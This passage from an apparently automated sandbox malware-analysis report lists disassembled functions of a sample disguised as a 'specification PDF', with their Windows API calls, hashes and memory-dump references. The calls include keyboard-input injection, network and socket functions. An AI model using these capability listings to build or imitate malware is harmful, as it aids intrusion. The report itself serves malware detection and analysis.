                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                      • Instruction ID: ae7704ff4e610db82a3968491d15c67685d99661c08a5059cfcc72c9a6aa7cdb
                                      • Opcode Fuzzy Hash: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                      • Instruction Fuzzy Hash: 8A517E75910208EFCF12DF68C980AAE7BB5FF56320F159669F8659B2A0D730ED41CB90
                                      Function 003674F7 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003671EF: GetOEMCP.KERNEL32(00000000), ref: 00367218
                                        • Part of subcall function 003669D0: Sleep.KERNEL32(00000000,00000000,00000000,00000000,?,00367DBD,00000018,003F6D60,00000008,00367D0B,00000000,00000000,?,00367ADD,0000000D), ref: 003669F2
                                      • InterlockedDecrement.KERNEL32(?), ref: 00367573
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00367599
                                      • InterlockedDecrement.KERNEL32 ref: 00367634
                                      • InterlockedIncrement.KERNEL32(00000000), ref: 00367658
                                        • Part of subcall function 00361C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                        • Part of subcall function 00361C9D: GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                      • String ID:
                                      • API String ID: 1703371082-0
                                      • Opcode ID: a516c680f17b3c08c5ee8b932b5032cd441aca8f3b5abb39836fec612802ceef
                                      • Instruction ID: db32e2d3211a383800278316890fe0a1f65eaca6ddf313a3b75f4d684f6f185a
                                      • Opcode Fuzzy Hash: a516c680f17b3c08c5ee8b932b5032cd441aca8f3b5abb39836fec612802ceef
                                      • Instruction Fuzzy Hash: 14410774908A448FCB139F7CD98466C7BA4AF08318F65C16AF859DF6AACB34CC42CB50
                                      Function 0038390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00383966
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00383982
                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003839EF
                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00383A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                      • Instruction ID: a457334c801127a980f3d3c8ef0624527be43fd4a298193a39f596ceb2089a20
                                      • Opcode Fuzzy Hash: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                      • Instruction Fuzzy Hash: 35411870A04348AEEF37AB64C805BFEBBB9AB55710F04019AF4C1963C1C7B89E85D765
                                      Function 003AB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003AB5D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                      • Instruction ID: f32c62ff7b14702936334e142a8a837137ffb0584581416bc67c9f5d20c38a3d
                                      • Opcode Fuzzy Hash: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                      • Instruction Fuzzy Hash: 3131E034A00204BFEF268F18CC89FA8BB68EB07350F554611FA51E65F3C734A9508B51
                                      Function 003AD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 003AD807
                                      • GetWindowRect.USER32(?,?), ref: 003AD87D
                                      • PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                      • MessageBeep.USER32(00000000), ref: 003AD8FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                      • Instruction ID: afec7bab69813dc1888a5163318aca7911a751a74dad17672e2630f3772166d6
                                      • Opcode Fuzzy Hash: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                      • Instruction Fuzzy Hash: A3418970A00218DFCB12DF58D884BA9BBF9FF4A311F1981A9E816DF660D739E941CB40
                                      Function 00383A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,7617A2E0,?,00008000), ref: 00383AB8
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00383AD4
                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00383B34
                                      • SendInput.USER32(00000001,?,0000001C,7617A2E0,?,00008000), ref: 00383B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                      • Instruction ID: 58d410d1e4e4de7fe155e829d406c92d0e27cc837bfcfed8a480d8010d1d7753
                                      • Opcode Fuzzy Hash: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                      • Instruction Fuzzy Hash: 5E3144B0A04348AEEF23AB64C819BFEBBAA9F45710F05019AE481973D1C7749F45C765
                                      Function 003A7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 003A7CB9
                                        • Part of subcall function 00385F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00385F6F
                                        • Part of subcall function 00385F55: GetCurrentThreadId.KERNEL32 ref: 00385F76
                                        • Part of subcall function 00385F55: AttachThreadInput.USER32(00000000,?,0038781F), ref: 00385F7D
                                      • GetCaretPos.USER32(?), ref: 003A7CCA
                                      • ClientToScreen.USER32(00000000,?), ref: 003A7D03
                                      • GetForegroundWindow.USER32 ref: 003A7D09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                      • Instruction ID: 78e49cc4643def858039ca1dd4bfb63128408b1c039cb26ed58e75e8f18e5ed4
                                      • Opcode Fuzzy Hash: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                      • Instruction Fuzzy Hash: 8C311E71900108AFDB01EFA9CC85DEFBBFDEF55314B118466F915E7221DA319E058BA0
                                      Function 0037DBBF Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0037DBD7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037DBF4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037DC2C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037DC52
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow
                                      • String ID:
                                      • API String ID: 2796087071-0
                                      • Opcode ID: 0b83c821261b99f5529f6faeaee09bcac8b948ecf05db70e2fee4c6a186f78a0
                                      • Instruction ID: c26d60b69847ac4005d964bc2a4d44a2e1c4e4a4612d2917868701de13120456
                                      • Opcode Fuzzy Hash: 0b83c821261b99f5529f6faeaee09bcac8b948ecf05db70e2fee4c6a186f78a0
                                      • Instruction Fuzzy Hash: 6621FF72204205ABEB279B29DC49E7B7BACDF45760F118039F80ECA191EAA5D841D3A0
                                      Function 00386318 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,?,?,?,003860C3), ref: 00386369
                                      • GetLastError.KERNEL32(?,?,?,003860C3), ref: 00386374
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 00386388
                                        • Part of subcall function 00386318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 003863E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: 4e4826ac47694c8226aafe0e2e70fa3d9bb510a8ca53b8e1d9284e6d7f961816
                                      • Instruction ID: 61dc453720a22617a3da3f6afc890792b722f0c29c8044454745045a075441b1
                                      • Opcode Fuzzy Hash: 4e4826ac47694c8226aafe0e2e70fa3d9bb510a8ca53b8e1d9284e6d7f961816
                                      • Instruction Fuzzy Hash: 5C21C3395043159BDB27BA78AC47FEA23ACAF06360F1044B9F445DB0E5EBE0A9849B54
                                      Function 003AF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetCursorPos.USER32(?), ref: 003AF211
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003BE4C0,?,?,?,?,?), ref: 003AF226
                                      • GetCursorPos.USER32(?), ref: 003AF270
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003BE4C0,?,?,?), ref: 003AF2A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                      • Instruction ID: a2dcfe44b0f796414d48b1e1fe28469362e19f7c3dc0cb7912966ba1525c5c64
                                      • Opcode Fuzzy Hash: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                      • Instruction Fuzzy Hash: A021803D500018AFCB169F94CC98EFA7BB9EF4A710F058869F9099B2A1D3319951DB50
                                      Function 0039431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00394358
                                        • Part of subcall function 003943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                        • Part of subcall function 003943E2: InternetCloseHandle.WININET(00000000), ref: 0039449E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                      • Instruction ID: 7cb79759bf4b9686747e53ff8a06b8daddb32e7581e94d8bc6a02c4ccb94307e
                                      • Opcode Fuzzy Hash: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                      • Instruction Fuzzy Hash: 5321A17A200605BBEF179F709C40FBBB7ADFF44711F14401ABA15D6A50DB71A8329B90
                                      Function 003A8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003A8AA6
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8AC0
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8ACE
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003A8ADC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                      • Instruction ID: 6af0b40dfa29a87de327b954c614048cb55a367598234e198d102dacf245311b
                                      • Opcode Fuzzy Hash: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                      • Instruction Fuzzy Hash: EA118E31205511AFD706AB18CC05FBA779DEF86321F144519F916DB2E2CFB0BD118794
                                      Function 00398A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00398AE0
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00398AF2
                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00398AFF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398B16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                      • Instruction ID: 0785721bb65bd64c30ae21b619b3872e7c230ff923aa4cd99982a26adf16308a
                                      • Opcode Fuzzy Hash: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                      • Instruction Fuzzy Hash: B5217871A001249FC7129F69CC85E9EBBFCEF4A350F04416AF84ADB251DB74DA458F90
                                      Function 00380AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00381E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381E77
                                        • Part of subcall function 00381E68: lstrcpyW.KERNEL32(00000000,?,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00381E9D
                                        • Part of subcall function 00381E68: lstrcmpiW.KERNEL32(00000000,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381ECE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AD4
                                      • lstrcpyW.KERNEL32(00000000,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AFA
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: cb54c555161892ac1a5131e6dfc06e713cb1da958cdb066b990fdfe953a8b0ea
                                      • Instruction ID: 89fded50bb46eedaa72d47453be115be2f8e1a0d8d8b6c06631e3f02e9c1fccd
                                      • Opcode Fuzzy Hash: cb54c555161892ac1a5131e6dfc06e713cb1da958cdb066b990fdfe953a8b0ea
                                      • Instruction Fuzzy Hash: 2911AF36200305AFDB27AF64D805D7A77A8FF45314F8140AAF806CB260EB71E845C7A0
                                      Function 0038058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003805AC
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003805C7
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003805DD
                                      • FreeLibrary.KERNEL32(?), ref: 00380632
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                      • String ID:
                                      • API String ID: 3137044355-0
                                      • Opcode ID: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                      • Instruction ID: 41f9e70c78f9979afcca4079f102ae8b8c9400c7ae8e3f17a6cb7a501362882f
                                      • Opcode Fuzzy Hash: f66648ba8498cfd7ae89ae221226b0b5437b081239853ff73747c572fa268138
                                      • Instruction Fuzzy Hash: 82218471900709EFEB66AF91DC88EDABBBCEF40700F0084A9E51696450E774EA59DF50
                                      Function 0037B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                        • Part of subcall function 0037AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                        • Part of subcall function 0037AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                        • Part of subcall function 0037AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                        • Part of subcall function 0037AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                      • GetLengthSid.ADVAPI32(?,00000000,0037ADE4,?,?), ref: 0037B21B
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0037B227
                                      • HeapAlloc.KERNEL32(00000000), ref: 0037B22E
                                      • CopySid.ADVAPI32(?,00000000,?), ref: 0037B247
                                      Memory Dump Source
